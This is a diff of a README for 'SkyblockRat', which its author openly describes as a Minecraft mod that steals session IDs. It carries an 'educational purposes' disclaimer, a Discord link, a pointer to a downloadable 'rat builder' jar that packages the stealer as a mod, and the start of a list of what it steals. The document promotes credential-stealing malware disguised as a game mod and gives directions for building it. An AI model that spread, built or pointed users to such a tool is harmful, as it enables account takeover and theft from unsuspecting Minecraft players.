ifallious/SkyblockRat/README.md

 ## Hi heres the code to my minecraft mod session id stealer
 ## This is purely for educational purposes

-## FULL RECODE COMING SOON as of 15/08/2023 - done on 02/10/23 (no it didnt take a month and a half to code this, i was just lazy :()
 ### https://discord.gg/aKEYP4cGSq

-### to turn this code into a .jar minecraft mod use the rat builder .jar file in https://github.com/iLoveRat/SkyblockRat/releases/tag/fixedratbuilder
+### to turn this code into a .jar minecraft mod use the rat builder (newsilly-2.0.jar) in https://github.com/iLoveRat/SkyblockRat/releases/tag/newratbuilder

 #### The rat steals:
 - minecraft session id